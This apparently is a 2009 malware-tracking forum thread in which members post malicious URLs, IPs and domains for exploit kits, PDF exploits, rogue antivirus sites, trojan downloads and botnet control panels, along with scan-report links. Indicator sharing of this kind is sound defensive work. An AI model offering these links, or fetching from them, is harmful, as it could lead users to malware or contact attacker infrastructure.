http://prosystemonlinescanner.com/promo/1/freescan.php?nu=880182&back==
http://worldcommercialbusiness.cn/soft.php?aid=0553&d=1&refer=d58bf6d15
http://pro-antimalware-scanner.com/promo/1/freescan.php?nu=880553&back==
-
Exploits/trojan
breakingnews.usnewnews.com/liveinternet.js
breakingnews.usnewnews.com/fresh/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=7ebea0ac579a5d9ca9e3156a662749e8&t=1235819223&type=js
http://www.virustotal.com/analisis/8eb587635d3bad9d37b9a5e7b06d2389
-
an92.net/myy/index.php
pdf exploits
an92.net/myy/firefox.pdfhttp://www.virustotal.com/analisis/3089407073a361a9f3091e57ffbe3c99 16/39
MD5...: 61ac62ef2879e4ce1682f730f2015f09
http://wepawet.cs.ucsb.edu/view.php?hash=5eb164252fc11870b11a94b37f3f4394&t=1235921432&type=js
an92.net/myy/firefox2.pdfhttp://www.virustotal.com/analisis/574194324cf37f372fb6fba43c282458 14/38
MD5...: 24ca3bb5e3843ad86fb8302f97cc709a
http://wepawet.cs.ucsb.edu/view.php?hash=742f6815506fe5158de1caf392d33025&t=1235921582&type=js
payload
an92.net/myy/load.php?xpl=pdf&browser=Firefoxhttp://www.virustotal.com/analisis/0e6347a92768298244d2a1969bc70fd4 4/39
MD5...: c0e86259278d8e3dba3fe346866022da
http://www.threatexpert.com/report.aspx?md5=c0e86259278d8e3dba3fe346866022da
requests
bucefal.org.ua/bro/ld.php?v=1&rs=76487-337-8429955-226141824245000&n=1&uid=1Emo-loader
-
pdf exploit
www.kuplon.biz/smun/pdf.php?id=2435&vis=1http://www.virustotal.com/analisis/47e606a0b63ebf3bcf819440f0da1441 13/39
MD5...: f1e5aa71ff2f65a7cf553ee011e2632c
http://wepawet.cs.ucsb.edu/view.php?hash=f66f78791092123d5e7989f47b548aa8&t=1235925405&type=js
payload
http://www.kuplon.biz/smun/load.php?id=2435&spl=69http://www.virustotal.com/analisis/c90c5ce9e2386722d6c21b38e5888c76 3/39
MD5: b0acf2f559db5d993ff720a74febdc83
-
pdf exploit
www.geodll.biz/ar/spl/pdf.pdf
setcontrol.biz/ar/spl/pdf.pdfhttp://www.virustotal.com/analisis/36622b4ff10e0293f3ed1b8e724d8a7c 6/39
MD5...: 647da8d2ee1213926331077babafb8e4
http://wepawet.cs.ucsb.edu/view.php?hash=a36fd77906ead994adcb7256c8be4a8c&t=1235928293&type=js
payload
geodll.biz/ar/exe.phphttp://www.virustotal.com/analisis/fb7fc693aa7b63865d25628f17b4bb0c 11/38
MD5...: e8034060f4e05f9e461faf7e139f2f5d
-
vsedlysna.ru/img/site/2/?viagrahttp://wepawet.cs.ucsb.edu/view.php?hash=b0807cd3d6f0c516fbd64a54e58ff0d2&t=1236073833&type=js
http://www.virustotal.com/analisis/9ff9a32c276bbcd97b2119a79312bce2
-
Malware Defender 2009 rogue related sites:
http://easywinscanner17.com/sysgd09_2/3/10284
MalwareDefender2009.com
http://gomaldef09.com/buy.html?track_id=10001&bill_id=0
http://89.149.251.181/maldef09/install.php?track_id=10284
http://89.149.251.181/maldef09/setup.php?track_id=10001
http://78.159.99.58/maldef09/install.php?track_id=10511
-
Av360 Throwaway sites contd...
http://whereismat.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://falloutneferwin.cn/soft.php?aid=0468&d=5&refer=bb916128e
http://whreismyplugnplay.cn/soft.php?aid=0560&d=1&refer=b8ced57fa
http://softwareoverworld.cn/soft.php?aid=0553&d=1&refer=d58bf6d15
http://fastantimalwarescan.com/promo/1/freescan.php?nu=880553&back==jQ20zj0NIMNMI=M
http://fast-antimalware-scanner.com/promo/1/freescan.php?nu=880182&back==DQ52zj0NIMMMI=M
http://fast-antimalware-scan.com/promo/1/freescan.php?nu=880468&back==zQ01Dj0NIMNMI=M
-
Advancesoftpc.com
Antispywarepro.net
scanspywareonline.net
Pcspeed-up.com
http://www.netspywarescan.com/online-scan.html?ewmid=225
-
http://easywinscanner17.com/maldef09_1/4/10242
http://fastantimalwarescan.com/promo/1/freescan.php?nu=880017&back=%3DTQ55jj2NAMNMI%3DO
-
Av360 Throwaway sites contd...
http://advertisechoice.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://vivaldinaruto.cn/soft.php?aid=1001&d=1&refer=184b911aa
http://awardspacelooksbig.cn/soft.php?aid=0468&d=5&refer=bb916128e
http://bestantimalwarescanner.com/promo/1/freescan.php?nu=880182&back==DQw3zj4NcMMMI=O
http://bestantimalwarelivescan.com/promo/1/freescan.php?nu=880468&back==TQ0xzj4NcMMMI=M
http://online-antimalware-scanner.com/promo/1/freescan.php?nu=881001&back==DQywDj3NAMNMI=O
ANG AntiVirus 09 rogue related
Angantivirus-2009.com
Angantivirus2009.com
-
Av360 Throwaway sites contd...
trustedpaymentsystem.com
antivirus360-protection.com
liveantivirusscanner.com
-
exploits/zbot
4you.vippif.comhttp://wepawet.cs.ucsb.edu/view.php?hash=f73ece587f4d906b256f108bbdb486c9&t=1236954537&type=js
-
hxxp://213.155.10.56/exe2/3913960.exe
hxxp://213.163.65.9/codec/140.exe
hxxp://asiametal.biz/tds/in.php
hxxp://dbs-softportal.com/viewtubesoftware.40016.exe
hxxp://fullantispywarescanner.com/promo/download/trial/InstallAVg_880899.exe
hxxp://heur.net63.net
hxxp://hothotvideo.com/install.php?uid=9c0baa17cab48c54e8a6d01b47ff1fb7
hxxp://likrion.ho.ua
hxxp://loyaltube.com/tube/?id=140
hxxp://mtwproductions.com.au/gate/
hxxp://porno-tube-x.com/l/berror/id/3913960/
hxxp://rusrm.com/z/cfg.bin
hxxp://streamingtubes2009.com/xplaymovie.php?id=40016
hxxp://viagra-generic-cialis-daily.com
hxxp://video-go.net/go/go.php?sid=1
hxxp://www.globalvisionobdr.com/gate/
hxxp://www.karinya.net.au
hxxp://xbalamquetulum.com
-
Rogue related
http://checkclick-site.info/install.php
http://checkclick-download.info/en/PE/install.exe
http://virusdoctor-pro.com/downloads/?uid=7&l=69
http://pay-virusdoctor.com/lo/5/index.php?
Virusmelt.com
Virusmeltpro.com
http://payvirusmelt.com/lo/5/index.php?
http://updvms.net/update.exe
http://updvms.cn/update.exe
http://updvms.net/Rpdm.exe
http://updvms.cn/Rpdm.exe
-
hxxp://nuclear777.com/1.1.0.0/
hxxp://videoblog.kilu.de/
hxxp://1.114central.com/17/02.htm
hxxp://1.114central.com/4/02.htm
hxxp://baidusib.cn/01/ytxxz.htm
hxxp://baidusib.cn/05/ytxxz.htm
hxxp://baidusib.cn/06/ytxxz.htm
hxxp://www.hynno8744.cn/13/02.htm
hxxp://www.hynno8744.cn/17/02.htm
hxxp://www.hynno8744.cn/18/02.htm
hxxp://www.hynno8744.cn/20/02.htm
hxxp://www.hynno8744.cn/21/02.htm
hxxp://www.hynno8744.cn/22/02.htm
hxxp://www.hynno8744.cn/23/02.htm
hxxp://www.hynno8744.cn/26/02.htm
hxxp://www.hynno8744.cn/29/02.htm
hxxp://www.hynno8744.cn/31/02.htm
-
hxxp://94.247.3.147/rot/xc01/index.php
hxxp://94.247.3.147/wpa/dog/index.php
hxxp://91.207.4.122/spm/s_alive.php?id=816050030546&tick=3910437&ver=500&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=663551200501&tick=423109&ver=202&smtp=b
hxxp://91.207.4.122/spm/s_alive.php?id=355751445710&tick=27198703&ver=202&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=522056062568&tick=24860734&ver=500&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=605657882560&tick=1229828&ver=201&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=255660652365&tick=228672609&ver=224&smt
There used to exist in public view "91.207.4.122/status", but now he/she's "fixed" that,redirecting to cn.yahoo.com.
Google still has the cache page though:
http://74.125.77.132/search?q=cache:4eUiegnhAFgJ:91.207.4.122/status+91.207.4.122
-
LeFiesta Exploit
http://89.248.172.156/660/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bce9710a8cfc8452ff64a0916ebf54a4&t=1234723683&type=js
http://biglendlive.info/hitstat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2d3e1eab37b1bf8225cccc6e808f0912&t=1236937612&type=js
http://lafi.babjr.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=96051f135ea17fc81786f21d8f6315d5&t=1235407081&type=js
http://leepe.cn/cat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=cf10ba345d696fb6b4b19704eeee4866&t=1236765069&type=js
http://leepe.cn/eng/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=c866c23b22cf6c8e8f993623c5060d9e&t=1237200054&type=js
http://piratik.biz/exp/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7fba86140376a1fc3e6fa8a4e05612bf&t=1235415814&type=js
http://piratik.biz/exp5/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2aa87c66d9d626cec6793fe1cd2d75e9&t=1235415776&type=js
http://thelegion74.com/yu5/index.php
http://vippif.com/fiesta/
http://wepawet.cs.ucsb.edu/view.php?hash=a1efe8f6cb881a9fd88991f4a4b25d1f&t=1237200606&type=js
http://weblife.net23.net/
http://wepawet.cs.ucsb.edu/view.php?hash=49ecb0704f81a59636e18607087534a1&t=1237201220&type=js
http://www.thebestlog.org/cruz/
http://wepawet.cs.ucsb.edu/view.php?hash=b44dd93b6aebad5b6b6d7eec57926621&t=1234633908&type=js
-
Koobface
http://viewworldh.com/download/1/1000/5
http://viewworldy.com/download/1/1000/5
http://ldj5.biz/setup.exe
MBR Rootkit /Sinowal / Mebroot new IP 76.76.22.221
http://akajjcthr.com/ld/ment/
-
http://1zs0ewvqcget52rl1z1n.cn/s_t_t.php
http://2d2deozghamea1m1ifn3.cn/s_t_t.php
http://dcz9ubei212vp3nrca5i.cn/s_t_t.php
http://ddvrrflabpqcuoaexpwp.cn/s_t_t.php
http://dihbgbwqryuolfbebgme.cn/s_t_t.php
http://egntxselsaossawilurx.cn/s_t_t.php
http://fcsvjiajnerwjjmtnfzu.cn/s_t_t.php
http://hsyzpbavkojdqclhnoqz.cn/s_t_t.php
http://ivdqvmbxktixdpleamjg.cn/s_t_t.php
http://jetvokzbdgktxubiiphn.cn/s_t_t.php
http://lmempodfzrqqkteyupar.cn/s_t_t.php
http://lufwhtelkadvrtaukqjo.cn/s_t_t.php
http://qjiv7qj4irh2f1o2v8sm.cn/s_t_t.php
http://tckeblkiumuhysrwqlev.cn/s_t_t.php
http://xbfnyukgdoqrjrsfmcdm.cn/s_t_t.php
http://xpehbam.cn/s_t_t.php
http://zjjrrhhuokjxgmulisxs.cn/s_t_t.php
http://znchygdrmelzejjvofji.cn/s_t_t.php
http://zteersxhgcddtfktecrq.cn/s_t_t.php
http://wepawet.iseclab.org/view.php?hash=de7f0c270430a281f48625fee7166324&t=1237203611&type=js
http://234954382524.cn
http://wepawet.iseclab.org/view.php?hash=d37fb9bbc20226eb605422b627e757ed&t=1237203979&type=js
http://438723847234.cn/sem/index.php
http://wepawet.iseclab.org/view.php?hash=de4915ce6ed63b2670e6c810ecdd2017&t=1237204176&type=js
http://adscounter.cn/package/
http://wepawet.iseclab.org/view.php?hash=77c3b2fc8a4cc7cbf7fcdf32d0c16119&t=1237204323&type=js
http://s1.s2.s3.s4.yahoo.com.longebook.cn/qq/
http://wepawet.iseclab.org/view.php?hash=26e6cf1dc8e2ab9be7e3172208dfcb92&t=1237205518&type=js
http://foxbelive.ru/pic1/
http://foxxpriv.ru/pic1/
http://wepawet.iseclab.org/view.php?hash=36da7ee709e19b965a17a4d88306ce00&t=1237205612&type=js
http://g00gle-analyze.com/slg2/
http://wepawet.iseclab.org/view.php?hash=a8ce4d33e27b67f88cfb7ed4fe845b56&t=1237050231&type=js
http://hunters-of-darkness.de/cgi-stat/index.php
http://wepawet.iseclab.org/view.php?hash=3b376c010ae0fbc67f6edd14fa48375a&t=1237206013&type=js
http://jimmgoland.1sthost.org/filter/
http://wepawet.iseclab.org/view.php?hash=59e48910a0e080084083b3ee824ef055&t=1237206179&type=js
http://ncsmichigan.com/images/pack/index.php
http://wepawet.iseclab.org/view.php?hash=3525a035f08a9dbffd6b63f448f285b0&t=1237206521&type=js
http://telenet.kz/kabel/cer/
http://wepawet.iseclab.org/view.php?hash=33f5575880f59efb8f70e53668da2610&t=1237207441&type=js
http://chriscleaningco.com/images/
http://gifts2009.net/aga/in.php
http://gold-sutra.info/gpack/
http://php4php.xtreemhost.com/admin/
http://prostolab.net/inf/index.php
http://russiannews.ru/arabic/data/news/upload/exp/
http://prostolab.net/inf/index.php
http://e.caricare.net/e/count.php?b=1004
http://e.caricare.net/e/ii.php?b=1004
-
FakeAV /TDSS
user4scan.com/download/install.php
http://wepawet.iseclab.org/view.php?hash=754d4813959d15ce5863681399b81592&t=1237085096&type=js
http://www.virustotal.com/analisis/78ce7b57f666f2530e83d9301b5341c8
-
Thanks guys,
I'm happy to see contributing members. Keep up the good work !
-
Rogue sites:
Spyware Fighter/Spy Fighter related sites
Spw-fighter.com
Spwfighter.com
Spyware-fighter.com
Spw-fight.com
Spywarefighter2009.com
Spwfight.com
Spywarefighter2k9.com
Spywarekick.com
Spywaresfighter.com
Spyfighter.biz
Spyfighter.org
http://spw-fight.com/in/4/1/1/0000000000000000
http://download.spw-fight.com/?user_id=0&sub_id=0&hash=0000000000000000
http://spwfght.com/download2.php?user=4&subid=32
http://spwfighter.com/dl/download2.php?user=4&subid=32
http://spyfighter.org/Installer.exe
-
Rogue related
http://renus2008.com/renus.exe
1-renus2008.com
3-antispyware3000.net
-
Rogue related too
go-uniq.com/in.cgi?13&gai=cspamg&gli=79
rotates to
removespywarethreats.com
desktoprepairpackage.com
pcantimalwaresolution.com
Some more at the same ips
malwareremovingtool.com
securecleanertool.com
cleanerpcsolution.com
-
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php
http://wepawet.iseclab.org/view.php?hash=8fe49cd0c89b388f76e9d3fc8d09ab6e&t=1237372107&type=js
http://aindu.cn/zz/index.php
http://wepawet.iseclab.org/view.php?hash=8bc9c4bf1530e2d953ae654caa8c2e77&t=1237372187&type=js
http://leepe.cn/eng2/index.php
http://agixo.cn/eng/index.php
http://agixo.cn/eng2/index.php
http://newsantimalware.com/720/
http://wepawet.iseclab.org/view.php?hash=fc40a6bb199d5c60ad8d42306e6e4756&t=1237372628&type=js
http://bdsm-movies.info/33/
http://wepawet.iseclab.org/view.php?hash=4397096bea5727c9b5b32d76b6eadbd2&t=1237372653&type=js
http://91.207.61.32/la/index.php
http://91.207.61.32/fies/index.php
http://wepawet.iseclab.org/view.php?hash=f2931444df46c8d9443abcb446b6eb8b&t=1237232079&type=js
-
Zbot IP that is the MDL but with different directories/drop now.
http://92.62.101.61/ready/farma.exe
http://92.62.101.61/ready/data.cab
http://92.62.101.61/ready/s192.php
-
another one:
http://vse-buddet-zae.biz/daite_deneg/X/ldr.exe
http://vse-buddet-zae.biz/daite_deneg/X/config.bin
http://vse-buddet-zae.biz/daite_deneg/X/snd.php
-
http://us18.ru/@/include/spl.php
leads to:
http://us18.ru/@/load.php
-
tw.lovechina.tw.cn/count/js/gif.gif
redirects to
cqfywg.cn/count/js/swf2.htm
cqfywg.cn/count/js/old.htm
cqfywg.cn/count/js/swfobject.js
cqfywg.cn/count/js/office.htm
cqfywg.cn/count/js/06014.htm
cqfywg.cn/count/js/92.htm
http://wepawet.iseclab.org/view.php?hash=e580167b34c4d2dd3e9dbaf8be2ca752&t=1237459572&type=js
http://wepawet.iseclab.org/view.php?hash=33298d136ed48b61bab20799d076f177&t=1237459770&type=js
-
Full file list on the server with sploits:
06014.htm
92.htm
gif.gif.htm
lz.htm
lz2.htm
office.htm
old.htm
real.gif
real2.htm
sina.htm
swf.htm
swf2.htm
swfobject.js
tj.htm
UU.htm
-
Rogue
http://mostpopularscan.com/
http://fullantispywareonlinescane.com/
http://fullantispywareonlinescane.com/promo/download/trial/InstallAVg_444.exe
http://filefixpro.com
http://free-web-scaners.com/disk/?code=286
-
Rogue related sites:
webscannertools.com
central-scan.com/full.exe
Fullantispywareonlinescane.com
antispywareupdateservice.com/download/security.bmp
platinumsecurityupdate.com/tsc/winsource.dll
thankyouforinstall.cn/order_xp.php?ver=444
powerfullantivirusproduct.com/order_av.php?ver=444
-
asionigolo.com/stats.php?id=21946398
leonads.com/stats-xp/1/
redirect to
84654321.cn/index.phphttp://wepawet.iseclab.org/view.php?hash=a9f579db0d42f30653ad3c7470164cdb&t=1237539274&type=js
-
hxxp://sadcwed.hostindianet.com/cache/readme.pdf
Result: 3/39 (7.7%):
http://www.virustotal.com/analisis/e0bbd1fd0710e2d670f8fb2fad822dc6
hxxp://sadcwed.hostindianet.com/cache/flash.swf
Result: 1/39 (2.57%)
http://www.virustotal.com/analisis/040394b274ccb44c3188719fd77448c8
-
hxxp://sadcwed.hostindianet.com/cache/readme.pdf
perfectnamestore.cn/in.cgi?income4
namebuyline.cn/in.cgi?income2
redirect you to this site. Some days ago they led to LuckySploit, today the lead to these exploits.
-
nuevas-videpostales.serveftp.net/retrieve/verpostal/ActiveX-Installer.exe
http://www.virustotal.com/analisis/a81a097348e41b3b8e27f79ed612812a 9/39
MD5...: 35414bbe4473ee111f54f5369da4a453
a-squared 4.0.0.101 2009.03.20 P2P-Worm.Win32.Palevo!IK
BitDefender 7.2 2009.03.20 Worm.P2P.Agent.Q
GData 19 2009.03.20 Worm.P2P.Agent.Q
Ikarus T3.1.1.48.0 2009.03.20 P2P-Worm.Win32.Palevo
McAfee+Artemis 5558 2009.03.19 Generic!Artemis
Microsoft 1.4502 2009.03.20 Worm:Win32/Silly_P2P.G
Prevx1 V2 2009.03.20 High Risk Cloaked Malware
Sophos 4.39.0 2009.03.20 Sus/Autorun-E
Symantec 1.4.4.12 2009.03.20 W32.SillyFDC
-
m.ef44ee.cn/a2/google.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=186377db538ece3350e1a6a5e8089c5c&t=1237563886&type=js
-
...redirect you to this site. Some days ago they led to LuckySploit, today the lead to these exploits.
There's more than one malware domains in the same ip... here's another one for example:
hxxp://ghrgt.hostindianet.com
My guess they'll continue registering domains over it every once in a while...
http://www.robtex.com/ip/94.247.3.151.html
Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates",heh...
-
Edit: Seems like the whole of 94.247.0.0/22 should be monitored for possible "updates",heh...
Oh yes.
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.151#result
-
:)
I like it when they make it easy for us...
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.150#result
http://www.bfk.de/bfk_dnslogger.html?query=94.247.3.152#result
-
hxxp://porn-money.org/in.cgi?5
hxxp://dissolute-office.com/123.php
hxxp://gujjipuzzi.net/in.cgi?pipka
hxxp://benyodil.cn/pagess.html
hxxp://benyodil.cn/senks/al1/1/info.php
hxxp://gcounter.cn
hxxp://divinets.cn/z/5.htm
hxxp://divinets.cn/z/z.htm
hxxp://agkt.info/evo/count.php?o=4
hxxp://agkt.info/evo/exploits/x19.php?o=2&t=1237604581&i=1430963245
hxxp://tayforlive.ru/loader.exe
hxxp://20-ka.cn/bots/svchost.exe
hxxp://rampartech.com
hxxp://typyxiolix.com/stats-xp/
hxxp://84654321.cn/load.php
hxxp://pingpinghost.com/license.exe
-
some malware
http://www.milehighhomefinder.com/include/class/tinymce1/a.exe
http://c-0p.cn:6135/qwer/lzz.css
-
Ambler trojan c&c panel login:
http://www.mybussines.biz/best/admin.php
http://fixet.ru/admin.php
-
rogue:
win-pc-defender.com
http://www.threatnuker.com/bin/ThreatNukerSetup.exe
-
http://judns.net/jud/pdf.php?id=124
http://judns.net/jud/pdf.php?id=111
http://judns.net/jud/load.php?id=9747&spl=2
-
exe it is pasted to gif
ppkok.cn/file/mm.gif
http://28.16868.org/long/logo.gif
http://28.16868.org/long/logo18.gif
-
Waledac
http://duklin.againstfear.com/news.exe
-
205.209.143.94/1122.htm
205.209.143.94/000f1.htm
205.209.143.94/000f2.htm
haola123123.com/7700.htm
haola123123.com/0081.htm
It seems that more domains are sharing the same files, as I got 1122.htm as a string in more than one executable, and all are requesting this file from other domain.
-
This one is quite a bit hilarious...
hxxp://ygy.ru/index.php
DL lists...
hxxp://b.wuc7.com/tt.txt
hxxp://l.sog369.com/list.txt
hxxp://www.iukjthgvg.cn/kankan.txt
hxxp://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
hxxp://best-click-download.info/install.php ---> Spawns fake av executable...
hxxp://69.249.79.161/print.exe
-> Waledac variant:
http://www.virustotal.com/analisis/892cc1f2514f891fc20c81baa4ec1a2f
http://www.bfk.de/bfk_dnslogger_en.html?query=78.129.166.5#result
I especially enjoyed this one in particular...
hxxp://rbckc.com/redir=1566237.php
-
http://dlmaldef09.com/maldef09/install.php?track_id=10284
http://getmaldef09.com/maldef09/setup.php?track_id=10284
http://84.16.247.29/maldef09/setup.php?track_id=10284
Now time to track the "Total Security Protection" rogue throwaway sites
http://transformercity.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://antivirusonlineproscanner.com/promo/1/freescan.php?nu=880479&back==jQx3Tz2NkMOMI=N
-
hxxp://xprotect.us/index.php?affid=02935
hxxp://personal-antivirus.com//download/PersonalAntivirus.exe
hxxp://protectprivacy18.com/maldef09_2/4/10250
hxxp://www.secure-data-group.com/
Various crap hosted in the following ips,i've only had a really quick look at them:
some domains out of them were already spotted in the past,others seem to be temporary "inactive" or so (yeah,sure...)
http://www.bfk.de/bfk_dnslogger_en.html?query=78.26.179.189#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.40#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.41#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.42#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.126#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.127#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.128#result
-
http://www.photogalleryy.com/image.phpRedirects to:
http://66.29.31.3/~rivux/PIC2009-02-15-JPG.exe
http://89.149.254.237/redirect.php?type=0redirect to:
http://cancelyourdreams.cn/Installer2.exe
there is malware there from 1-6:
http://hackdownload.cn/install/1.exe
-
hxxp://anti-virus-2010-pro.info/install.php
hxxp://anti-virus-2010-pro-downloads.info/en/exe/install.exe
http://www.bfk.de/bfk_dnslogger_en.html?query=70.38.19.201#result
================================================
Now,if someone can explain me what in the world is the purpose of this one... ???
hxxp://www.anti-virus-1.net/
It loads a Kaspersky .jpg advertisement from here...
hxxp://www.vaginoplasty-1.net/AV.jpg
Which is an open dir as well...
hxxp://www.vaginoplasty-1.net/
-
Waledac:
http://antiterrornetwork.com/run.exe
http://fearalert.com/run.exe
http://terrorfear.com/run.exe
http://antiterroris.com/run.exe
http://terroralertstatus.com/run.exe
http://chatloveonline.com/run.exe
http://lovecentralonline.com/run.exe
http://supersalesonline.com/run.exe
http://bestlifeblog.com/run.exe
http://mobilephotoblog.com/run.exe
I could sit for hours and get like 100 of domains which host it ;D
-
I could sit for hours and get like 100 of domains which host it ;D
Lol ;-)
In a side-note,the ShadowServer people are mainting a regularly updated list of Waledac domains...
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
-
good to know :o
i was checking domains registered on the same IP with http://www.bfk.de/bfk_dnslogger_en.html
-
Rootkit TDss
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.exe
OSX/RSPlug-F (user agent=Mac OS X)
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg
http://www.virustotal.com/it/analisis/438939832ba104f34907e919bc2ddac1
-
Waledac crap...current detection rates in VirusTotal at 6/39 (15.39%),here's a sample report:
http://www.virustotal.com/analisis/fb778f91c5a76e68eddbec3955c7dd44
hxxp://24.9.38.40/save.exe
hxxp://64.95.58.150/contact.exe
hxxp://64.95.58.153/news.exe
hxxp://67.223.10.108/save.exe
hxxp://69.242.22.235/main.exe
hxxp://69.14.54.169/save.exe
hxxp://69.14.99.11/contact.exe
hxxp://98.127.138.99/print.exe
hxxp://98.127.144.188/contact.exe
hxxp://99.190.177.125/run.exe
C&C servers...
hxxp://213.155.4.80/bm/controller.php?action=bot&entity_list=
hxxp://213.155.6.32/fine/controller.php?action=bot&entity_list=
hxxp://medievalmusic.by.ru/ -> Open dir...
More crap in the same ip,spamming/phishing etc...
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
http://www.robtex.com/ip/87.242.78.57.html
It also redirects strhq.cn that was spotted previously...
hxxp://medievalmusic.by.ru/mhstchk.php
-
It also redirects strhq.cn that was spotted previously...
hxxp://medievalmusic.by.ru/mhstchk.php
Have you seen this ?
<?php echo "<!--"."hello_my_little_friend._You_have_download_this_page_and_see_th" . "is_source._We_do_not_delete_anything_only_upload_change_your_passwords_and_do_not_say_it_to_anybody"."-->"; ?>
-
He-he,yeah,quite ridiculous,isn't it? And it's the "haitou.php" scumbags again...
-
))
-
In:
http://interhack777.by.ruhttp://wepawet.iseclab.org/view.php?hash=083efd85e283aff8a4fd9c18839aa1cf&t=1237898209&type=js
iframe of:
http://interhack777.by.ru.33406df8d1f8b3f1.beencn.cn/china.cn/http://wepawet.iseclab.org/view.php?hash=45dc5f553ec84eb856a67f69c4f330a0&t=1237898552&type=js
which redirects to luckysploit at:
http://193.138.172.15/salo/?t=6http://wepawet.iseclab.org/view.php?hash=04288c0e3940bbf4229e4d19f439e43a&t=1237478938&type=js
that downloads a trojan at:
http://193.138.172.15/salo/?h=17http://www.virustotal.com/analisis/bf83ca150e492a461d5ee61efbdb3987
another trojan that is downloaded is:
http://lousecn.cn/load/6FCF55/ie709001http://www.virustotal.com/analisis/e437f79fac10473bf74647dcd7326662
-
variant of Win32/Adware.Agent.NLE
hxxp://av1-click-download.info/en/PE/QWProtect.dll
http://www.virustotal.com/analisis/6374e6460d03174dc78c5a2081eeb6ce
-
and on the same IP:
http://av1-click-site.info/
-
http://best-tube-home.com/
http://check-ms-antivirus.com/
Both use social engineer of Media player codec to download from:
http://files.ms-loads-av.com/exe/setup_1_2_1.exe
only one anti virus hit:
http://www.virustotal.com/analisis/126210179d475c81a40b6a371cef7c6d
-
Redirect/Contains exploits(pdf exploit domain is on mdl)
http://bc69.by.ru
pdf exploit which it redirects to:
http://vpsspeedin.ru/1/pdf.phphttp://wepawet.iseclab.org/view.php?hash=6f162c5dc313445ba755f9a799be7725&t=1237919023&type=js
downloads zbot at:
http://virtyoz.info/image/fi/load.php?id=35&spl=4http://www.virustotal.com/analisis/ce5fe16d39d64107ad2cd6884973a4c7
-
Some of my dingleberries from last few weeks :P
193.138.172.15/salo/?147b3cce4c7a455a85f424e630027351bf0decf9f5c2b6d461921318e73373ab5e0130cfa1d11ea6c772b232b5d24e7ad2226b2dc8abc83c2ad9492b6db74993
193.138.172.15/salo/?20630100614f1cb3b7617371a94dbb01aa6d6dea5501ab9b7bf031b622f263e38c36d0fbabdd4cc02766c70ef43594ab87f95e5a6dedbb95c1c2002dc05b14ef
193.138.172.15/salo/?5d9a3d064381864ad8ed6762adf8565929609ff4ff7598a008a3221cd4f456817bb3295a4c3a96ee7340286017c5b6b22632f52f4e3129e820b07e0528d987e0
193.138.172.15/salo/?6b76746d927a2b6a6ad63796b25d9a570c150a54f2639109ac0d45a04f4a964d11024c9721a1528be007f8ad424a5c495523b1c915d1b3d370c65a64291f9df2
193.138.172.15/salo/?t=6
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053000060B10
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530060C1117
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530090F1419
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530292F3439
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530787E8389
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053083898E93
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A3A9AEB3
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A9AEB3B8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530B2B8BDC2
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000000376600000001760000005DEB000530F9FF0409
209.34.91.23/imp2/12400.php
64.225.158.70/aNI022328/?code=BundleBase1.2328
64.225.158.70/bpx/xS5PN9.exe
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530191F2429
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
84.244.138.55/ase/?17d5d5f9dd0c1644f0f6b20b74ec080c4851ccd7da471b3ffe20293cba2e2f8981cacb18bd70dcae3597fc9eeb532e5ba20ea2283c25034d7c7a97df26c2ecac
84.244.138.55/ase/?712243de3e49129542d7beaf3af5e88f733447a27f28b850760e21c47fa99c7f3b589f8d92c08a3172ca3256cdb9c70c44c67b0a8990710d9ba987d4e3acda69
84.244.138.55/ase/?8a14b1d4f1a9842e935b9c14a07a5979f6e7639d50aff7bd0ec99dbbc3c36624d75277965f27068231bc845ab36d730920afc0341b1e0912c4a41c243676b411
